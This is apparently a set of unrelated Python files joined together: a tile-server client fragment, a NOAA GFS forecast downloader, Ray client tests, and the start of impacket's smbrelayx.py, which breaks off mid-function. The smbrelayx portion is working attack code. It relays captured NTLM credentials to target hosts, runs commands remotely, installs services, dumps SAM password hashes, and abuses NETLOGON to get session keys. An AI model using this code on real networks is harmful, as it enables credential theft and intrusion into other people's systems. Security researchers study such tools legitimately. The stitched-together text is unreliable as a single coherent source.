url = "http://{host}:{port}/api/v1/tiles/?d={tile_id}".format(
host=self.host, port=self.port, tile_id=tile_id
)
req = requests.get(url)
if req.status_code != 200:
raise ServerError("Error fetching tile:", req.content)
content = json.loads(req.content)
return content[tile_id]
def chromsizes(self, uid):
"""
Return the chromosome sizes from the given filename
"""
url = "http://{host}:{port}/api/v1/chrom-sizes/?id={uid}".format(
host=self.host, port=self.port, uid=uid
)
req = requests.get(url)
if req.status_code != 200:
raise ServerError("Error fetching chromsizes:", req.content)
return req.content
@property
def api_address(self):
return "http://{host}:{port}/api/v1".format(host=self.host, port=self.port)
|
gfs_retrieve_latest.py
|
#!/usr/bin/env python
from __future__ import print_function
from datetime import datetime, timedelta
from os import makedirs, path
from posixpath import basename
from shutil import copyfileobj
from sys import argv
from tempfile import gettempdir
from threading import Thread
from urllib2 import urlopen
from urlparse import urlsplit
GFS_PATH = argv[1] + path.sep
GFS_FILE = 'http://www.ftp.ncep.noaa.gov/data/nccf/com/gfs/prod/gfs.{0}/gfs.t{1}z.pgrb2.1p00.f{2:03d}'
GFS_CYCLE_BUFFER = 5
if not path.exists(GFS_PATH):
makedirs(GFS_PATH)
def download_grib(path_remote):
grib_remote = urlopen(path_remote)
path_local = GFS_PATH + basename(urlsplit(grib_remote.geturl()).path)
with open(path_local, 'wb') as grib_local:
copyfileobj(grib_remote, grib_local)
cycle = datetime.utcnow() - timedelta(hours=GFS_CYCLE_BUFFER)
if 0 <= cycle.hour < 6:
cycle = cycle.replace(hour=0)
elif 6 <= cycle.hour < 12:
cycle = cycle.replace(hour=6)
elif 12 <= cycle.hour < 18:
cycle = cycle.replace(hour=12)
else:
cycle = cycle.replace(hour=18)
gribs = []
for hour in range(0, 243, 3):
gribs.append(GFS_FILE.format(cycle.strftime('%Y%m%d%H'), cycle.strftime('%H'), hour))
#for hour in range(252, 396, 12):
# gribs.append(GFS_FILE.format(cycle.strftime('%Y%m%d%H'), cycle.strftime('%H'), hour))
threads = []
for grib in gribs:
t = Thread(target=download_grib, args=(grib,))
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join()
|
test_client.py
|
import os
import pytest
import time
import sys
import logging
import queue
import threading
import _thread
from unittest.mock import patch
import numpy as np
from ray.util.client.common import OBJECT_TRANSFER_CHUNK_SIZE
import ray.util.client.server.server as ray_client_server
from ray.tests.client_test_utils import create_remote_signal_actor
from ray.tests.client_test_utils import run_wrapped_actor_creation
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import connect_to_client_or_not
from ray.util.client.ray_client_helpers import ray_start_client_server
from ray._private.client_mode_hook import client_mode_should_convert
from ray._private.client_mode_hook import disable_client_hook
from ray._private.client_mode_hook import enable_client_mode
from ray._private.test_utils import run_string_as_driver
@pytest.mark.parametrize("connect_to_client", [False, True])
def test_client_context_manager(ray_start_regular_shared, connect_to_client):
import ray
with connect_to_client_or_not(connect_to_client):
if connect_to_client:
# Client mode is on.
assert client_mode_should_convert(auto_init=True)
# We're connected to Ray client.
assert ray.util.client.ray.is_connected()
else:
assert not client_mode_should_convert(auto_init=True)
assert not ray.util.client.ray.is_connected()
def test_client_thread_safe(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
return "ok"
class Blocker(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.daemon = True
def run(self):
ray.get(block.remote())
b = Blocker()
b.start()
time.sleep(1)
# Can concurrently execute the get.
assert ray.get(fast.remote(), timeout=5) == "ok"
# @pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
# @pytest.mark.skip()
def test_client_mode_hook_thread_safe(ray_start_regular_shared):
with ray_start_client_server():
with enable_client_mode():
assert client_mode_should_convert(auto_init=True)
lock = threading.Lock()
lock.acquire()
q = queue.Queue()
def disable():
with disable_client_hook():
q.put(client_mode_should_convert(auto_init=True))
lock.acquire()
q.put(client_mode_should_convert(auto_init=True))
t = threading.Thread(target=disable)
t.start()
assert client_mode_should_convert(auto_init=True)
lock.release()
t.join()
assert q.get() is False, "Threaded disable_client_hook failed to disable"
assert q.get() is True, "Threaded disable_client_hook failed to re-enable"
def test_interrupt_ray_get(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with ray_start_client_server() as ray:
@ray.remote
def block():
print("blocking run")
time.sleep(99)
@ray.remote
def fast():
print("fast run")
time.sleep(1)
return "ok"
class Interrupt(threading.Thread):
def run(self):
time.sleep(2)
_thread.interrupt_main()
it = Interrupt()
it.start()
with pytest.raises(KeyboardInterrupt):
ray.get(block.remote())
# Assert we can still get new items after the interrupt.
assert ray.get(fast.remote()) == "ok"
def test_get_list(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def f():
return "OK"
assert ray.get([]) == []
assert ray.get([f.remote()]) == ["OK"]
get_count = 0
get_stub = ray.worker.server.GetObject
# ray.get() uses unary-unary RPC. Mock the server handler to count
# the number of requests received.
def get(req, metadata=None):
nonlocal get_count
get_count += 1
return get_stub(req, metadata=metadata)
ray.worker.server.GetObject = get
refs = [f.remote() for _ in range(100)]
assert ray.get(refs) == ["OK" for _ in range(100)]
# Only 1 RPC should be sent.
assert get_count == 1
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
# Make sure ray.put(1) == 1 is False and does not raise an exception.
objectref = ray.put(1)
assert not objectref == 1
# Make sure it returns True when necessary as well.
assert objectref == ClientObjectRef(objectref.id)
# Assert output is correct type.
list_put = ray.put([1, 2, 3])
assert isinstance(list_put, ClientObjectRef)
assert ray.get(list_put) == [1, 2, 3]
def test_put_failure_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
class DeSerializationFailure:
def __getstate__(self):
return ""
def __setstate__(self, i):
raise ZeroDivisionError
dsf = DeSerializationFailure()
with pytest.raises(ZeroDivisionError):
ray.put(dsf)
# Ensure Ray Client is still connected
assert ray.get(ray.put(100)) == 100
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or (
ready,
remaining,
) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) or (
ready_retval,
remaining_retval,
) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef(b"blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
SignalActor = create_remote_signal_actor(ray)
signaler = SignalActor.remote()
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
# Timeout 0 on ray.wait leads to immediate return
# (not indefinite wait for first return as with timeout None):
unready_ref = signaler.wait.remote()
res = ray.wait([unready_ref], timeout=0)
# Not ready.
assert res[0] == [] and len(res[1]) == 1
ray.get(signaler.send.remote())
ready_ref = signaler.wait.remote()
# Ready.
res = ray.wait([ready_ref], timeout=10)
assert len(res[0]) == 1 and res[1] == []
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return "Hello " + whom, self.count
@ray.method(num_returns=2)
def say_hi(self, whom):
self.count += 1
return "Hi " + whom, self.count
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
ref = actor.say_hello.remote("world")
s, count = ray.get(ref)
assert s == "Hello world"
assert count == 2
r1, r2 = actor.say_hi.remote("ray")
assert ray.get(r1) == "Hi ray"
assert ray.get(r2) == 3
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact, 10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(
actor_handle.exec_exec.remote(second_actor, fact, 9)
) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj, 4)) == local_fact(4)
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
# Allow some time to propagate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2, logs_with_id
assert any((msg.find("get") >= 0 for msg in logs_with_id)), logs_with_id
assert any((msg.find("put") >= 0 for msg in logs_with_id)), logs_with_id
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
num_hello = 0
for msg in log_msgs:
if "Hello world" in msg:
num_hello += 1
assert num_hello == 2, f"Invalid logs: {log_msgs}"
def test_serializing_exceptions(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(ValueError, match="Failed to look up actor with name 'abc'"):
ray.get_actor("abc")
def test_invalid_task(ray_start_regular_shared):
with ray_start_client_server() as ray:
with pytest.raises(TypeError):
@ray.remote(runtime_env="invalid value")
def f():
return 1
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor."""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
@ray.method(num_returns=2)
def half(self):
return self.x / 2, self.x / 2
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
detatched_actor = ray.get_actor("test_acc2")
for i in range(5):
detatched_actor.inc.remote()
assert ray.get(detatched_actor.get.remote()) == 6
h1, h2 = ray.get(detatched_actor.half.remote())
assert h1 == 3
assert h2 == 3
def test_error_serialization(ray_start_regular_shared):
"""Test that errors will be serialized properly."""
fake_path = os.path.join(os.path.dirname(__file__), "not_a_real_file")
with pytest.raises(FileNotFoundError):
with ray_start_client_server() as ray:
@ray.remote
def g():
with open(fake_path, "r") as f:
f.read()
# Raises a FileNotFoundError
ray.get(g.remote())
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") is None
def test_startup_retry(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
with pytest.raises(ConnectionError):
ray_client.connect("localhost:50051", connection_retries=1)
def run_client():
ray_client.connect("localhost:50051")
ray_client.disconnect()
thread = threading.Thread(target=run_client, daemon=True)
thread.start()
time.sleep(3)
server = ray_client_server.serve("localhost:50051")
thread.join()
server.stop(0)
ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
@ray_client.remote
def f(x):
time.sleep(4)
return x
def stop_server(server):
time.sleep(2)
server.stop(0)
server = ray_client_server.serve("localhost:50051")
ray_client.connect("localhost:50051")
thread = threading.Thread(target=stop_server, args=(server,))
thread.start()
x = f.remote(2)
with pytest.raises(ConnectionError):
_ = ray_client.get(x)
thread.join()
ray_client.disconnect()
ray_client._inside_client_test = False
# Wait for f(x) to finish before ray.shutdown() in the fixture
time.sleep(3)
@patch.dict(os.environ, {"RAY_ENABLE_AUTO_CONNECT": "0"})
def test_client_gpu_ids(call_ray_stop_only):
import ray
ray.init(num_cpus=2)
with enable_client_mode():
# No client connection.
with pytest.raises(Exception) as e:
ray.get_gpu_ids()
assert (
str(e.value) == "Ray Client is not connected."
" Please connect by calling `ray.init`."
)
with ray_start_client_server():
# Now have a client connection.
assert ray.get_gpu_ids() == []
def test_client_serialize_addon(call_ray_stop_only):
import ray
import pydantic
ray.init(num_cpus=0)
class User(pydantic.BaseModel):
name: str
with ray_start_client_server() as ray:
assert ray.get(ray.put(User(name="ray"))).name == "ray"
object_ref_cleanup_script = """
import ray
ray.init("ray://localhost:50051")
@ray.remote
def f():
return 42
@ray.remote
class SomeClass:
pass
obj_ref = f.remote()
actor_ref = SomeClass.remote()
"""
def test_object_ref_cleanup():
# Checks no error output when running the script in
# object_ref_cleanup_script
# See https://github.com/ray-project/ray/issues/17968 for details
with ray_start_client_server():
result = run_string_as_driver(object_ref_cleanup_script)
assert "Error in sys.excepthook:" not in result
assert "AttributeError: 'NoneType' object has no " not in result
assert "Exception ignored in" not in result
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25552 --port 0"],
indirect=True,
)
def test_wrapped_actor_creation(call_ray_start):
"""
When the client schedules an actor, the server will load a separate
copy of the actor class if it's defined in a separate file. This
means that modifications to the client's copy of the actor class
aren't propagated to the server. Currently, tracing logic modifies
the signatures of actor methods to pass around metadata when ray.remote
is applied to an actor class. However, if a user does something like:
class SomeActor:
def __init__(self):
pass
def decorate_actor():
RemoteActor = ray.remote(SomeActor)
...
Then the SomeActor class will have its signatures modified on the client
side, but not on the server side, since ray.remote was applied inside of
the function instead of directly on the actor. Note if it were directly
applied to the actor then the signature would be modified when the server
imports the class.
"""
import ray
ray.init("ray://localhost:25552")
run_wrapped_actor_creation()
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25553 --num-cpus 0"],
indirect=True,
)
@pytest.mark.parametrize("use_client", [True, False])
def test_init_requires_no_resources(call_ray_start, use_client):
import ray
if use_client:
address = call_ray_start
ray.init(address)
else:
ray.init("ray://localhost:25553")
@ray.remote(num_cpus=0)
def f():
pass
ray.get(f.remote())
@pytest.mark.parametrize(
"call_ray_start",
["ray start --head --ray-client-server-port 25553 --num-cpus 1"],
indirect=True,
)
def test_object_ref_release(call_ray_start):
import ray
ray.init("ray://localhost:25553")
a = ray.put("Hello")
ray.shutdown()
ray.init("ray://localhost:25553")
del a
with disable_client_hook():
ref_cnt = ray.util.client.ray.get_context().client_worker.reference_count
assert all(v > 0 for v in ref_cnt.values())
def test_empty_objects(ray_start_regular_shared):
"""
Tests that the client works with "empty" objects. Sanity check, since put requests
will fail if the serialized version of an object consists of zero bytes.
"""
objects = [0, b"", "", [], np.array(()), {}, set(), None]
with ray_start_client_server() as ray:
for obj in objects:
ref = ray.put(obj)
if isinstance(obj, np.ndarray):
assert np.array_equal(ray.get(ref), obj)
else:
assert ray.get(ref) == obj
def test_large_remote_call(ray_start_regular_shared):
"""
Test remote calls with large (multiple chunk) arguments
"""
with ray_start_client_server() as ray:
@ray.remote
def f(large_obj):
return large_obj.shape
@ray.remote
def f2(*args):
assert args[0] == 123
return args[1].shape
@ray.remote
def f3(*args, **kwargs):
assert args[0] == "a"
assert args[1] == "b"
return kwargs["large_obj"].shape
# 1024x1024x16 f64's =~ 128 MiB. The chunking size is 64 MiB, which guarantees
# that transferring the argument requires multiple chunks.
assert OBJECT_TRANSFER_CHUNK_SIZE < 2 ** 20 * 128
large_obj = np.random.random((1024, 1024, 16))
assert ray.get(f.remote(large_obj)) == (1024, 1024, 16)
assert ray.get(f2.remote(123, large_obj)) == (1024, 1024, 16)
assert ray.get(f3.remote("a", "b", large_obj=large_obj)) == (1024, 1024, 16)
@ray.remote
class SomeActor:
def __init__(self, large_obj):
self.inner = large_obj
def some_method(self, large_obj):
return large_obj.shape == self.inner.shape
a = SomeActor.remote(large_obj)
assert ray.get(a.some_method.remote(large_obj))
if __name__ == "__main__":
if os.environ.get("PARALLEL_CI"):
sys.exit(pytest.main(["-n", "auto", "--boxed", "-vs", __file__]))
else:
sys.exit(pytest.main(["-sv", __file__]))
|
smbrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# SMB Relay Module
#
# Author:
# Alberto Solino (@agsolino)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc. It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first try to authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the smbclient portion. It is supposed to be
# working on any LM Compatibility level. The only way to stop this attack
# is to enforce SPN checks and/or signing on the server.
#
# If the target system is enforcing signing and a machine account was provided,
# the module will try to gather the SMB session key through
# NETLOGON (CVE-2015-0005)
#
# If the authentication against the target succeeds, the client authentication
# succeeds as well and a valid connection is established against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want so that the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
from __future__ import division
from __future__ import print_function
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
import http.server
import socketserver
import argparse
import base64
import logging
import os
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from binascii import unhexlify, hexlify
from struct import pack, unpack
from threading import Thread
from six import PY2
from impacket import version
from impacket.dcerpc.v5 import nrpc
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections, SOCKS
from impacket.examples.ntlmrelayx.clients.smbrelayclient import SMBRelayClient
from impacket.nt_errors import ERROR_MESSAGES
from impacket.nt_errors import STATUS_LOGON_FAILURE, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NOT_SUPPORTED, \
STATUS_MORE_PROCESSING_REQUIRED
from impacket.ntlm import NTLMAuthChallengeResponse, NTLMAuthNegotiate, NTLMAuthChallenge, AV_PAIRS, \
NTLMSSP_AV_HOSTNAME, generateEncryptedSessionKey
from impacket.smb import NewSMBPacket, SMBCommand, SMB, SMBSessionSetupAndX_Data, SMBSessionSetupAndX_Extended_Data, \
SMBSessionSetupAndX_Extended_Response_Parameters, SMBSessionSetupAndX_Extended_Response_Data, \
SMBSessionSetupAndX_Parameters, SMBSessionSetupAndX_Extended_Parameters, TypesMech, \
SMBSessionSetupAndXResponse_Parameters, SMBSessionSetupAndXResponse_Data
from impacket.smb3 import SMB3
from impacket.smbconnection import SMBConnection
from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile, SMBSERVER
from impacket.spnego import ASN1_AID, SPNEGO_NegTokenResp, SPNEGO_NegTokenInit
try:
from Cryptodome.Cipher import DES, AES, ARC4
except Exception:
logging.critical("Warning: You don't have any crypto installed. You need pycryptodomex")
logging.critical("See https://pypi.org/project/pycryptodomex/")
# Global Variables
# This is the list of hosts that have been attacked already in case -one-shot was chosen
ATTACKED_HOSTS = set()
CODEC = sys.getdefaultencoding()
class doAttack(Thread):
def __init__(self, SMBClient, exeFile, command, raw):
Thread.__init__(self)
if isinstance(SMBClient, SMB) or isinstance(SMBClient, SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.__exeFile = exeFile
self.__command = command
self.__raw = raw
self.__answerTMP = b''
if exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
global ATTACKED_HOSTS
if self.__exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? Needed to avoid INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception as e:
logging.debug('Exception:', exc_info=True)
# Something went wrong, most probably we don't have access as admin. Aborting.
logging.error(str(e))
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
return
try:
if self.__command is not None:
if self.__raw:
remoteOps._RemoteOperations__executeRemoteRaw(self.__command)
else:
remoteOps._RemoteOperations__executeRemote(self.__command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
if not self.__raw:
self.__answerTMP = b''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
logging.debug('Raw answer %r' % self.__answerTMP)
try:
print(self.__answerTMP.decode(CODEC))
except UnicodeDecodeError:
logging.error('Decoding error detected, consider running chcp.com at the target,\nmap the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html\nand then execute wmiexec.py '
'again with -codec and the corresponding codec')
print(self.__answerTMP)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.debug('Exception:', exc_info=True)
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
try:
ATTACKED_HOSTS.remove(self.__SMBConnection.getRemoteHost())
except Exception as e:
logging.error(str(e))
pass
class SMBClient(SMB):
def __init__(self, remote_name, extended_security = True, sess_port = 445):
self._extendedSecurity = extended_security
self.domainIp = None
self.machineAccount = None
self.machineHashes = None
SMB.__init__(self,remote_name, remote_name, sess_port = sess_port)
def neg_session(self):
neg_sess = SMB.neg_session(self, extended_security = self._extendedSecurity)
return neg_sess
def setUid(self,uid):
self._uid = uid
def login_standard(self, user, domain, ansiPwd, unicodePwd):
smb = NewSMBPacket()
smb['Flags1'] = 8
sessionSetup = SMBCommand(SMB.SMB_COM_SESSION_SETUP_ANDX)
sessionSetup['Parameters'] = SMBSessionSetupAndX_Parameters()
sessionSetup['Data'] = SMBSessionSetupAndX_Data()
sessionSetup['Parameters']['MaxBuffer'] = 65535
sessionSetup['Parameters']['MaxMpxCount'] = 2
sessionSetup['Parameters']['VCNumber'] = os.getpid()
sessionSetup['Parameters']['SessionKey'] = self._dialects_parameters['SessionKey']
sessionSetup['Parameters']['AnsiPwdLength'] = len(ansiPwd)
sessionSetup['Parameters']['UnicodePwdLength'] = len(unicodePwd)
sessionSetup['Parameters']['Capabilities'] = SMB.CAP_RAW_MODE
sessionSetup['Data']['AnsiPwd'] = ansiPwd
sessionSetup['Data']['UnicodePwd'] = unicodePwd
sessionSetup['Data']['Account'] = user
sessionSetup['Data']['PrimaryDomain'] = domain
sessionSetup['Data']['NativeOS'] = 'Unix'
sessionSetup['Data']['NativeLanMan'] = 'Samba'
smb.addCommand(sessionSetup)
self.sendSMB(smb)
smb = self.recvSMB()
try:
smb.isValidAnswer(SMB.SMB_COM_SESSION_SETUP_ANDX)
except:
logging.error("Error login_standard")
return None, STATUS_LOGON_FAILURE
else:
self._uid = smb['Uid']
return smb, STATUS_SUCCESS
def setDomainAccount( self, machineAccount, machineHashes, domainIp):
self.machineAccount = machineAccount
self.machineHashes = machineHashes
self.domainIp = domainIp
if self._SignatureRequired is True:
if self.domainIp is None:
logging.error("Signature is REQUIRED on the other end, attack will not work")
else:
logging.info("Signature is REQUIRED on the other end, using NETLOGON approach")
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
logging.info("Connecting to %s NETLOGON service" % self.domainIp)
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'] )
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = AV_PAIRS(av_pairs)
serverName = av_pairs[NTLMSSP_AV_HOSTNAME][1].decode('utf-16le')
except:
logging.debug("Exception:", exc_info=True)
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount,'', domainName, lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName+'\x00', '12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = unhexlify(self.machineHashes.split(':')[1])
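# Derive the Netlogon session key from the machine account's NT hash and the client/server challenges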
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678', serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
nrpc.hNetrServerAuthenticate3(dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel, serverName + '\x00',
ppp, 0x600FFFFF)
